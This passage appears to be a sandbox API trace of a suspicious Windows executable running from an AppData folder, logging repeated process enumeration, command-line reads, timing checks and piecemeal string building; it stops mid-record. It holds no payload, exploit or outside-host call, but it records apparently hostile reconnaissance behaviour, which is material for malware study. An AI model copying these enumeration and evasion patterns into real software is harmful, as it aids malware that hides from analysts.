th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0094.367] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0094.368] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0094.369] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0094.370] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0094.371] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0094.372] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0094.373] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0094.423] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0094.424] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0094.426] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0094.427] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.429] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.430] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.431] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.433] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.434] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0094.435] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0094.437] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.438] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.439] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.441] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.442] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0094.443] CloseHandle (hObject=0xcc) returned 1 [0094.443] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0094.443] GetTickCount () returned 0x22e6f [0094.443] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc1c | out: lpPerformanceCount=0x12fc1c*=15123206019) returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="L\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="S\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="f\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="k\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="R\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="H\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="u\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="r\x12ﰘ\x12\x01") returned 1 [0094.443] GetTickCount () returned 0x22e6f [0094.443] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc1c | out: lpPerformanceCount=0x12fc1c*=15123238904) returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="S\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="y\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="p\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="y\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="k\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="b\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="c\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="k\x12ﰘ\x12\x01") returned 1 [0094.443] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0094.443] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc0 [0094.450] Process32FirstW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.451] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.452] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.452] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.453] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.454] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.455] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.456] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.457] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.458] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0094.459] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.459] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.460] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.461] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.462] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.463] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.464] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.465] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.465] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.468] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.469] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.471] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0094.472] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.474] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.476] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.477] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.479] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0094.480] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0094.482] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0094.483] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0094.485] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0094.486] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0094.488] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0094.489] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0094.491] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0094.492] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0094.494] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0094.495] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0094.497] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0094.498] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0094.500] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0094.501] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0094.502] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0094.504] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0094.505] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0094.506] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0094.508] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.509] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, 